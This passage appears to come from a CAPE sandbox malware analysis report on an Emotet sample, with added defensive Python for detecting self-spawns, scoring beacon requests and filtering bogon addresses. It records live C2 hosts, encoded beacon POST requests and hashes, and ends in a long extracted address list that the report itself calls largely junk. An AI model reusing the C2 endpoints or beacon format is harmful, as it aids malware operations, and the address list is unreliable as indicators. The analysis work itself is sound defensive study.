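HEX_ARG_RE = re.compile(r"^--[0-9a-f]{8}$")


@dataclass
class Proc:
    name: str
    pid: int
    ppid: int
    path: str = ""
    cmdline: str = ""


def parse_process_tree(text: str) -> list:
    """Turn CAPE's flattened process-tree text into Proc records."""
    procs = []
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            procs.append(Proc(m["name"], int(m["pid"]), int(m["ppid"])))
        elif line.startswith("Full Path: ") and procs:
            procs[-1].path = line[len("Full Path: "):]
        elif line.startswith("Command Line: ") and procs:
            procs[-1].cmdline = line[len("Command Line: "):]
    return procs


def _lone_hex_arg(cmdline: str, image: str) -> bool:
    """True for '--xxxxxxxx' alone (CAPE's argument-only form) or '<image> --xxxxxxxx'."""
    parts = cmdline.rsplit(None, 1)
    if not parts or not HEX_ARG_RE.match(parts[-1]):
        return False
    return len(parts) == 1 or parts[0].strip('"').lower() == image.lower()


def find_self_spawns(procs: list) -> list:
    """(parent pid, child pid, image) where a process re-launches its own image with --<hex>."""
    by_pid = {p.pid: p for p in procs}
    hits = []
    for p in procs:
        parent = by_pid.get(p.ppid)
        if parent and parent.path.lower() == p.path.lower() and _lone_hex_arg(p.cmdline, p.path):
            hits.append((parent.pid, p.pid, p.path))
    return hits


def find_service_launches(procs: list) -> list:
    """(pid, image) for binaries that services.exe started out of SysWOW64.
    A lead, not a verdict: confirm against the service's registry entry."""
    by_pid = {p.pid: p for p in procs}
    hits = []
    for p in procs:
        parent = by_pid.get(p.ppid)
        if parent and parent.name.lower() == "services.exe" and "\\syswow64\\" in p.path.lower():
            hits.append((p.pid, p.path))
    return hits


if __name__ == "__main__":
    tree = parse_process_tree(PROCESS_TREE)
    for ppid, pid, image in find_self_spawns(tree):
        print(f"self-spawn with --<hex> argument: {ppid} -> {pid} {image}")
    for pid, image in find_service_launches(tree):
        print(f"service-launched from SysWOW64: {pid} {image}")
```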

Hosts

Direct  IP               Country Name
Y       90.57.69.215     France
Y       78.188.7.213     Turkey
Y       75.177.169.225   United States
Y       207.44.45.27     United States
Y       191.92.69.115    Colombia
Y       138.68.13.161    United States

TCP

Source          Source Port   Destination      Destination Port
192.168.35.22   49177         138.68.13.161    8080
192.168.35.22   49178         138.68.13.161    8080
192.168.35.22   49179         138.68.13.161    8080
192.168.35.22   49180         138.68.13.161    8080
192.168.35.22   49181         138.68.13.161    8080
192.168.35.22   49173         191.92.69.115    80
192.168.35.22   49176         207.44.45.27     22
192.168.35.22   49174         75.177.169.225   80
192.168.35.22   49175         78.188.7.213     8090
192.168.35.22   49172         90.57.69.215     80

UDP

No UDP connections recorded.

DNS

No domains contacted.

HTTP Requests

URI Data
http://138.68.13.161:8080/xian/
POST /xian/ HTTP/1.1
Referer: http://138.68.13.161/xian/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 138.68.13.161:8080
Content-Length: 427
Connection: Keep-Alive
Cache-Control: no-cache

c8gTrn24=NIkQDZEYiYrwuT3cSK5OvHgEXEzRYGK%2FDbt734Ir5wFLF6UHXCsPk3ZI6L8qAb1b8GgSkb3WE3PgsxS%2FBFFkg5t4BUkwAqBIXBwAIkmwErtwGHln7%2B3KInSptPltuORRyi0HtI85gdFJO9sm6J5Y3hnnSALwR5m4YhOjc8FxM79wPKyTLglNs6uF%2BqWPmWP53GwFVinFcbfha2skA%2Fh6xcMd4ZsLTgokBuUT5Zblk06dUEpDVb1wjutigQ42oL1W%2FcXmyxHcPZWyIm4mjv9tG78oiS84bJDSESYTeCllIP7EbU6l%2BXyI%2BPEzOIP3hIpsPhaaARHHqr%2FUPzk2oZ3EJiKGzRoUexh2ML5%2Fw9ajjgBLZFXJ3O%2FLFCveu9EdcSu3elskqg%3D%3D
http://138.68.13.161:8080/loadan/
POST /loadan/ HTTP/1.1
Referer: http://138.68.13.161/loadan/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 138.68.13.161:8080
Content-Length: 433
Connection: Keep-Alive
Cache-Control: no-cache

Fa0EUVGmWqX4iPtQ=uBRSJALyik76VOjpBGl3Mjda3ux4vd7hNSD2hwbmLl%2BCBdh%2FbkSPEGKk0l7JHGfPE4BSCCkMrVd6ufZcc9h9MGorJcxc2UJ5JQDotHWIsGoJuZVKgjtgCaKHId7bHrFiyi0HtI85gdFJO9sm6J5Y3hnnSALwR5m4YhOjc8FxM79wPKyTLglNs6uF%2BqWPmWP53GwFVinFcbfha2skA%2Fh6xcMd4ZsLTgokBuUT5Zblk06dUEpDVb1wjutigQ42oL1W%2FcXmyxHcPZWyIm4mjv9tG78oiS84bJDSESYTeCllIP7EbU6l%2BXyI%2BPEzOIP3hIpsPhaaARHHqr%2FUPzk2oZ3EJiKGzRoUexh2ML5%2Fw9ajjgBLZFXJ3O%2FLFCveu9EdcSu3elskqg%3D%3D
http://138.68.13.161:8080/pdf/devices/symbols/merge/
POST /pdf/devices/symbols/merge/ HTTP/1.1
Referer: http://138.68.13.161/pdf/devices/symbols/merge/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 138.68.13.161:8080
Content-Length: 440
Connection: Keep-Alive
Cache-Control: no-cache

UeIXCtwVWxTZpID6FcF=UdmF0PFcsoX4%2FETG9CrhkGM2ubKxxJfJ6K8Bd%2FE5TOCHpJH09ZPjD9EAunTIQXcdMqUVVMr6%2FNZ%2F2a52nm6mbs21vFCIaORIIQcMJXt8WyePe3pg8TaawaI9WS9STodwyi0HtI85gdFJO9sm6J5Y3hnnSALwR5m4YhOjc8FxM79wPKyTLglNs6uF%2BqWPmWP53GwFVinFcbfha2skA%2Fh6xcMd4ZsLTgokBuUT5Zblk06dUEpDVb1wjutigQ42oL1W%2FcXmyxHcPZWyIm4mjv9tG78oiS84bJDSESYTeCllIP7EbU6l%2BXyI%2BPEzOIP3hIpsPhaaARHHqr%2FUPzk2oZ3EJiKGzRoUexh2ML5%2Fw9ajjgBLZFXJ3O%2FLFCveu9EdcSu3elskqg%3D%3D
http://138.68.13.161:8080/vermont/publish/
POST /vermont/publish/ HTTP/1.1
Referer: http://138.68.13.161/vermont/publish/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 138.68.13.161:8080
Content-Length: 430
Connection: Keep-Alive
Cache-Control: no-cache

zrvjf3thL=RTZms5%2FwN8bLiuJ42C6rLQneH8Czg1%2B526xAHaWa1xJ%2Bm9vGA924FzRuhUinNiU5JF5dd3Z8EdE%2FfREW9QUTtkBuTgzp9DO0CFpi8iYstpHph0TTbiwL6jrCdFufrp6Jyi0HtI85gdFJO9sm6J5Y3hnnSALwR5m4YhOjc8FxM79wPKyTLglNs6uF%2BqWPmWP53GwFVinFcbfha2skA%2Fh6xcMd4ZsLTgokBuUT5Zblk06dUEpDVb1wjutigQ42oL1W%2FcXmyxHcPZWyIm4mjv9tG78oiS84bJDSESYTeCllIP7EbU6l%2BXyI%2BPEzOIP3hIpsPhaaARHHqr%2FUPzk2oZ3EJiKGzRoUexh2ML5%2Fw9ajjgBLZFXJ3O%2FLFCveu9EdcSu3elskqg%3D%3D
http://138.68.13.161:8080/results/sess/
POST /results/sess/ HTTP/1.1
Referer: http://138.68.13.161/results/sess/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 138.68.13.161:8080
Content-Length: 424
Connection: Keep-Alive
Cache-Control: no-cache

XvIAb=e%2F238Au0n8U6pqn07P8WAkSlAY1cazBkFK5HR05DPRoXtWHyrnd4%2FtK4ddyqisGn2haxGg0D41I6g243%2BCC0J60ZRd1QLQhBSERmkTufIqxLjoGercApow8GNqWDWBwnyi0HtI85gdFJO9sm6J5Y3hnnSALwR5m4YhOjc8FxM79wPKyTLglNs6uF%2BqWPmWP53GwFVinFcbfha2skA%2Fh6xcMd4ZsLTgokBuUT5Zblk06dUEpDVb1wjutigQ42oL1W%2FcXmyxHcPZWyIm4mjv9tG78oiS84bJDSESYTeCllIP7EbU6l%2BXyI%2BPEzOIP3hIpsPhaaARHHqr%2FUPzk2oZ3EJiKGzRoUexh2ML5%2Fw9ajjgBLZFXJ3O%2FLFCveu9EdcSu3elskqg%3D%3D
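All five POSTs above have the same shape: a POST to a bare IP on port 8080 with no DNS lookup beforehand (the DNS section is empty), a Referer that repeats the request path on the same IP but drops the port, a form body with one randomly named key whose value is URL-encoded base64, and an outdated MSIE 7.0 User-Agent. The five bodies also differ only in the first 128 base64 characters of the value; the remainder is identical across requests. The Python below is an added example, not part of CAPE or this report: it scores a raw request against those features so the heuristic can be run over proxy logs or reassembled requests from a pcap. EMOTET_REQUEST is the /xian/ request above reconstructed as a raw message; BENIGN_REQUEST is a constructed control. A score of 6 means every feature hit; the legacy User-Agent is the weakest of them.

```python
import base64
import binascii
import ipaddress
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed test input: the /xian/ request recorded in this report.
EMOTET_REQUEST = (
    "POST /xian/ HTTP/1.1\r\n"
    "Referer: http://138.68.13.161/xian/\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "DNT: 1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; "
    "SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; "
    ".NET4.0C; .NET4.0E)\r\n"
    "Host: 138.68.13.161:8080\r\n"
    "Content-Length: 427\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
    "c8gTrn24=NIkQDZEYiYrwuT3cSK5OvHgEXEzRYGK%2FDbt734Ir5wFLF6UHXCsPk3ZI6L8qAb1b8GgSkb3WE3PgsxS%2FBFFkg5t4BUkwAqBIXBwAIkmwErtwGHln7%2B3KInSptPltuORRyi0HtI85gdFJO9sm6J5Y3hnnSALwR5m4YhOjc8FxM79wPKyTLglNs6uF%2BqWPmWP53GwFVinFcbfha2skA%2Fh6xcMd4ZsLTgokBuUT5Zblk06dUEpDVb1wjutigQ42oL1W%2FcXmyxHcPZWyIm4mjv9tG78oiS84bJDSESYTeCllIP7EbU6l%2BXyI%2BPEzOIP3hIpsPhaaARHHqr%2FUPzk2oZ3EJiKGzRoUexh2ML5%2Fw9ajjgBLZFXJ3O%2FLFCveu9EdcSu3elskqg%3D%3D"
)

# Constructed control: an ordinary form login that should score 0.
BENIGN_REQUEST = (
    "POST /login HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Referer: https://www.example.com/\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
    "Content-Length: 31\r\n"
    "\r\n"
    "username=alice&password=hunter2"
)

FORM_KEY_RE = re.compile(r"^[A-Za-z0-9]{4,32}$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, lower-cased headers and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": target, "headers": headers, "body": body}


def _host_parts(host_header: str):
    """(hostname, explicit port or None) from a Host header value."""
    parts = urlsplit("//" + host_header)
    return parts.hostname, parts.port


def _is_ip(host) -> bool:
    try:
        ipaddress.ip_address(host or "")
        return True
    except ValueError:
        return False


def _base64_payload_len(value: str) -> int:
    """Decoded length if value is a well-formed base64 blob, else 0."""
    if not B64_RE.match(value):
        return 0
    try:
        return len(base64.b64decode(value, validate=True))
    except binascii.Error:
        return 0


def score_request(raw: str) -> dict:
    """Score one request against the beacon features seen in this report."""
    req = parse_request(raw)
    h = req["headers"]
    host, port = _host_parts(h.get("host", ""))
    ref = urlsplit(h.get("referer", ""))
    fields = parse_qsl(req["body"], keep_blank_values=True)   # URL-decodes the value
    has_referer = bool(h.get("referer"))

    features = {
        "post_to_bare_ip": req["method"] == "POST" and _is_ip(host),
        "self_referer": has_referer and ref.hostname == host and ref.path == req["path"],
        "referer_drops_port": port is not None and has_referer and ref.port is None,
        "single_random_form_key": (
            h.get("content-type", "").startswith("application/x-www-form-urlencoded")
            and len(fields) == 1
            and bool(FORM_KEY_RE.match(fields[0][0]))
        ),
        "base64_blob_value": len(fields) == 1 and _base64_payload_len(fields[0][1]) >= 64,
        "legacy_ie_user_agent": "MSIE 7.0" in h.get("user-agent", ""),
    }
    return {"score": sum(features.values()), "features": features}


if __name__ == "__main__":
    for label, raw in (("emotet", EMOTET_REQUEST), ("benign", BENIGN_REQUEST)):
        verdict = score_request(raw)
        hits = [k for k, v in verdict["features"].items() if v]
        print(f"{label}: score {verdict['score']} {hits}")
```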

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

Source           Destination      ICMP Type                      Data
191.92.69.115    192.168.35.22    3 (destination unreachable)
191.92.69.115    192.168.35.22    3 (destination unreachable)
191.92.69.115    192.168.35.22    3 (destination unreachable)
207.44.45.27     192.168.35.22    3 (destination unreachable)
207.44.45.27     192.168.35.22    3 (destination unreachable)
207.44.45.27     192.168.35.22    3 (destination unreachable)
75.177.169.225   192.168.35.22    3 (destination unreachable)
78.188.7.213     192.168.35.22    3 (destination unreachable)
78.188.7.213     192.168.35.22    3 (destination unreachable)

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Suricata Extracted Files

No Suricata extracted files.

JA3

No JA3 hashes found.

File name gluerel.exe
Associated Filenames
C:\Windows\SysWOW64\gluerel.exe
File Size 76800 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 e6794e6260d39e25db2f04af257acc3f
SHA1 eabc4ee8576f54f4dcde5f6133e926f21ac5c44a
SHA256 4fd7e69b107fe0c6493339f845a3c6482f6ab370f35952a13bff026b6c9a7cf2
CRC32 8CA4A6EF
Ssdeep 1536:DXgQIKlOUcKXCNUheD3fhNiuGnhzGYXgAq1oaW:D3sUtyNUhelGhaM
ClamAV None
Yara None matched
CAPE Yara None matched
Type Emotet Config
address
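The address list that follows is extractor output, not a vetted indicator set: it contains entries in 0.0.0.0/8 (0.214.143.29), loopback (127.184.38.44), multicast (232.114.233.73) and the reserved 240.0.0.0/4 block (250.138.162.203, 255.224.222.137), none of which can be a live C2, so the extractor has most likely read past the real (ip, port) table. The only endpoint the sample exchanged HTTP with in this run was 138.68.13.161:8080; four of the other five TCP destinations answered with ICMP type 3. The Python below is an added example, not CAPE code: it parses ip:port lines, rejects entries in bogon ranges, and cross-checks the survivors against the destinations the sandbox actually observed. EXTRACTED is a constructed subset of the list below; OBSERVED is taken from the Hosts and TCP sections of this report.

```python
import ipaddress

# Ranges that cannot hold an Internet-facing C2: RFC 1122 (0/8, 127/8),
# RFC 1918, RFC 6598, link-local, documentation/benchmark nets, multicast
# 224/4 and reserved 240/4. A config entry inside any of them is extractor
# output to discard, not an indicator.
BOGON_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.0.2.0/24",
    "192.168.0.0/16", "198.18.0.0/15", "198.51.100.0/24", "203.0.113.0/24",
    "224.0.0.0/4", "240.0.0.0/4",
)]

# Constructed subset of the 'address' values in this report's Emotet Config.
EXTRACTED = """\
194.231.182.196:33907
232.114.233.73:36713
250.138.162.203:22576
151.16.106.135:1895
127.184.38.44:44430
0.214.143.29:4535
255.224.222.137:11062
90.121.3.188:224
138.204.35.240:4424
"""

# Destinations the sandbox actually connected to (Hosts / TCP sections).
OBSERVED = {
    ("138.68.13.161", 8080), ("191.92.69.115", 80), ("207.44.45.27", 22),
    ("75.177.169.225", 80), ("78.188.7.213", 8090), ("90.57.69.215", 80),
}


def parse_endpoint(line: str):
    """Parse 'ip:port'; raises ValueError for anything malformed."""
    host, sep, port = line.strip().rpartition(":")
    if not sep:
        raise ValueError("no port")
    ip = ipaddress.ip_address(host)          # ValueError on garbage
    port = int(port)
    if not 1 <= port <= 65535:
        raise ValueError("port out of range")
    return ip, port


def bogon_reason(ip) -> str:
    """The bogon network containing ip, or '' if it is routable."""
    for net in BOGON_NETS:
        if ip in net:
            return str(net)
    return ""


def triage_config(text: str, observed=frozenset()) -> dict:
    """Split extracted endpoints into candidates, rejects (with a reason) and
    candidates confirmed by the sandbox's own network capture."""
    out = {"candidates": [], "rejected": [], "confirmed": []}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        try:
            ip, port = parse_endpoint(line)
        except ValueError as err:
            out["rejected"].append((line, str(err)))
            continue
        reason = bogon_reason(ip)
        if reason:
            out["rejected"].append((line, "in " + reason))
            continue
        endpoint = (str(ip), port)
        out["candidates"].append(endpoint)
        if endpoint in observed:
            out["confirmed"].append(endpoint)
    return out


def junk_fraction(result: dict) -> float:
    """Share of rejected entries; a high value means the extractor over-read."""
    total = len(result["candidates"]) + len(result["rejected"])
    return len(result["rejected"]) / total if total else 0.0


if __name__ == "__main__":
    result = triage_config(EXTRACTED, OBSERVED)
    for line, why in result["rejected"]:
        print(f"reject {line:<24} {why}")
    print("candidates:", result["candidates"])
    print("confirmed by capture:", result["confirmed"])
    print(f"junk fraction: {junk_fraction(result):.2f}")
```

A candidate that survives the bogon filter is still only a candidate; the confirmed list is what the capture backs up, and the junk fraction is the quickest way to tell whether the extracted table deserves any trust at all.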
194.231.182.196:33907
232.114.233.73:36713
250.138.162.203:22576
151.16.106.135:1895
94.204.209.71:35825
13.183.97.146:21289
25.125.141.26:17210
144.116.123.156:28710
209.250.66.149:32174
153.122.88.166:42768
170.74.92.38:28309
156.218.156.44:41508
226.120.21.150:61415
45.253.221.86:39497
245.251.164.105:5067
146.1.232.130:56026
28.161.84.221:27605
215.253.113.127:2580
184.131.56.196:2052
127.184.38.44:44430
32.84.71.171:29963
200.220.105.203:19715
90.120.71.181:15878
11.254.12.182:9456
211.52.115.224:18810
138.204.35.240:4424
104.48.18.44:1060
95.213.79.150:9292
62.91.22.236:16333
5.233.95.5:29359
185.77.11.33:14777
183.207.189.98:50002
174.55.91.4:4332
76.189.34.76:4039
19.192.126.231:1617
46.211.255.93:52733
211.218.201.153:15545
159.146.130.27:31535
182.24.73.135:46024
125.239.50.232:62034
117.158.139.202:47474
145.106.168.134:53166
79.196.38.8:57098
189.73.237.178:36145
132.96.219.33:58259
155.119.153.140:43820
75.107.133.113:56161
1.243.59.211:12572
90.121.3.188:224
33.201.95.208:27754
183.45.1.25:13249
192.217.137.183:52375
143.85.175.65:17841
241.219.119.9:38154
185.40.35.42:6540
124.253.211.46:57742
181.233.143.152:9912
153.122.45.34:50716
8.255.244.188:33936
208.189.35.192:2074
237.180.253.218:53122
20.135.6.65:43121
37.91.22.227:60465
255.224.222.137:11062
199.57.245.30:30904
170.11.114.16:16552
107.72.197.231:22727
123.138.102.113:7991
181.16.45.159:34197
124.15.0.189:55319
75.126.173.64:40856
23.156.210.184:46488
235.195.106.66:967
57.73.49.111:309
0.214.143.29:4535
187.245.235.11:55723
120.34.66.32:13328
18.202.195.170:47407
0.80.139.135:25682
200.61.2.130:4660
188.191.235.84:55812
153.114.241.10:63274
80.196.171.140:16400
164.74.114.168:8801
107.170.204.81:50435
140.247.190.46:35982
104.66.55.13:10565
102.51.215.239:44326
54.185.159.150:24388
254.37.121.108:8910
100.67.216.110:60110
73.229.70.27:2067
62.82.114.197:2063
27.216.58.167:8874
227.198.45.138:19756
206.37.38.209:5226
154.179.194.106:62538
162.237.78.236:9344
251.115.22.217:31540
194.122.181.28:54718
38.182.174.76:40173
232.55.61.205:24837
119.252.153.175:21501
149.130.97.94:64503
92.191.42.215:15745
206.2.54.55:1184
118.195.118.119:43095
137.29.30.1:55132
120.162.229.253:8863
64.106.125.143:7465
161.164.214.153:58434
17.141.203.248:13016
74.111.141.130:26145
7.245.84.186:13032
207.107.93.200:15986
126.87.55.127:1496
213.214.100.188:39924
178.135.53.102:52851
187.12.252.228:5329
130.76.84.1:12211
106.4.197.226:63315
250.43.185.209:15617
27.20.144.179:27379
68.154.88.100:20026
11.184.152.26:1724
37.49.252.146:52803
18.179.109.249:57561
147.115.41.123:50177
146.248.241.90:44789
90.179.41.221:30327
208.156.12.145:15914
181.151.57.173:40101
106.102.11.15:57445
168.235.210.214:14854
112.80.132.46:2696
150.40.224.145:53802
200.63.45.4:33580
56.134.24.142:53968
50.11.224.105:8741
249.35.156.13:46759
82.190.79.13:32174
31.6.91.57:56601
150.144.79.187:9530
248.22.23.155:30418
191.179.34.2:57268
136.77.150.0:42841
46.192.74.63:56431
11.21.233.201:33760
98.155.177.121:44601
41.183.104.25:48315
239.230.182.63:33944
95.107.179.62:21878
26.187.207.224:42343
150.65.151.208:8847
93.232.237.191:34073
90.248.126.82:19715
160.109.77.118:9054
18.128.123.248:28989
18.6.67.158:63771
217.239.247.19:35525
202.132.96.177:21002
15.215.164.100:19020
42.191.219.238:37348
71.69.163.85:37501
15.4.93.181:62751
102.27.142.164:48149
85.248.225.37:63245
105.88.226.167:39765
166.222.170.6:57464
109.228.254.88:1282
156.240.254.112:52425
145.140.60.103:583
7.176.249.241:62351
212.54.193.40:25862
155.137.83.46:5256
32.180.233.98:56276
119.154.153.157:44181
81.83.175.63:17841
173.217.119.35:329
117.130.63.105:59083
12.113.156.192:44570
182.67.238.106:12362
18.91.208.236:43779
190.225.153.181:27537
134.22.186.193:11379
68.203.193.133:62255
97.154.214.160:51600
205.89.105.42:577
115.223.48.243:19922
59.102.73.2:1972
171.93.253.70:53232
64.245.25.242:31970
70.245.255.84:62719
213.123.198.89:41989
156.239.210.45:52103
38.68.161.238:37704
12.90.239.143:1727
180.235.120.25:3473
28.113.63.67:33730
228.18.226.242:35172
246.233.98.100:20694
97.13.169.210:52482
45.74.109.180:2047
52.208.53.89:54061
252.39.29.37:32655
199.60.116.17:18115
244.138.137.201:56553
8.203.154.75:21301
21.81.97.159:30021
220.253.211.109:37319
91.200.107.118:23008
190.230.58.145:40385
48.140.118.115:3957
221.18.61.223:28719
164.19.222.31:48825
148.195.180.9:8015
98.179.87.193:64141
223.57.176.133:22284
131.96.117.59:3808
157.190.189.136:12778
72.24.6.136:44136
129.142.203.125:12476
1.177.202.244:40183
32.210.208.25:58136
109.60.185.248:49787
81.159.20.146:61075
76.227.5.136:31210
113.138.150.225:32145
46.114.224.197:59956
20.217.131.53:37219
250.6.229.141:40245
64.139.87.221:57868
198.17.92.123:10013
234.205.132.62:6825
247.87.208.220:5208
44.165.104.186:8183
251.236.206.151:27168
231.252.249.179:62219
1.114.150.97:61067
62.148.148.96:45584
169.117.183.169:62012
33.100.139.127:52793
186.206.38.179:58621
9.251.211.245:11177
29.228.24.101:49040
134.194.246.243:53502
233.11.11.185:14620
126.152.1.119:63669
152.128.197.88:57527
45.86.150.191:20782
102.15.238.54:54717
82.145.238.164:30306
58.233.80.249:2644
37.224.66.6:28849
170.113.222.128:7219
221.68.0.165:12881
151.34.100.128:22067
35.179.253.2:693
215.39.241.157:39431
233.15.21.169:9996
233.207.20.224:9812
243.149.8.1:12975
149.40.170.35:42555
149.88.254.64:51603
149.107.23.222:37240
45.203.135.87:46594
132.37.136.205:60008
154.231.198.11:47145
238.249.138.70:48589
47.208.143.184:57882
105.219.128.138:14637
203.16.125.135:20331
11.191.225.91:54264
77.251.219.98:59670
115.158.55.22:30148
8.37.71.111:26026
152.201.216.162:59919
188.223.219.209:11906